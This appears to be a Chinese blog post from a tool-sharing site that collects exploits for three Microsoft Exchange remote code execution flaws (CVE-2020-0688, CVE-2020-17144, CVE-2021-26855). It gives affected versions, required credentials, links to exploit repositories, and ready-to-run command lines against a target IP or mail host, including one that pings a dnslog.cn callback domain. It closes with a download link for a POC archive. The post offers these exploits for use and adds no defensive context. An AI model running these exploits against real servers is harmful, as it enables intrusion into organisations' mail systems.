Exchange 部分漏洞

# CVE-2020-0688 Exchange RCE

前提:
已知一个域用户

影响版本:
-Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30
-Microsoft Exchange Server 2013 Cumulative Update 23
-Microsoft Exchange Server 2016 Cumulative Update 15
-Microsoft Exchange Server 2019 Cumulative Update 4

exp1:
[@Ridter](https://github.com/Ridter/cve-2020-0688)
“`
python cve-2020-0688.py -s https://ip/owa/ -u user -p pass -c “ping test.ph4nxq.dnslog.cn”
“`
exp2:
[@zcgonvh](https://github.com/zcgonvh/CVE-2020-0688)
“`
ExchangeCmd ip user password
“`

# CVE-2020-17144 Exchange RCE

前提:
普通用户

影响版本:
-Microsoft Exchange Server 2010

exp1:
[@Airboi](https://github.com/Airboi/CVE-2020-17144-EXP)

“`
CVE-2020-17144-EXP.exe mail.example.com user pass
“`

# CVE-2021-26855 Exchange RCE
影响版本:
– Microsoft Exchange Server 2010
– Microsoft Exchange Server 2013
– Microsoft Exchange Server 2016
– Microsoft Exchange Server 2019

exp:
[@o2oxy](https://www.o2oxy.cn/3169.html)

“`
python exp.py 192.168.217.152 administrator@ex.com
“`
![exp.png](/media/editor/exp_20210720210505017319.png)

## POC
[点我下载 Exchange部分漏洞POC.zip](/Gr33kLibrary/download_tool/105/)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容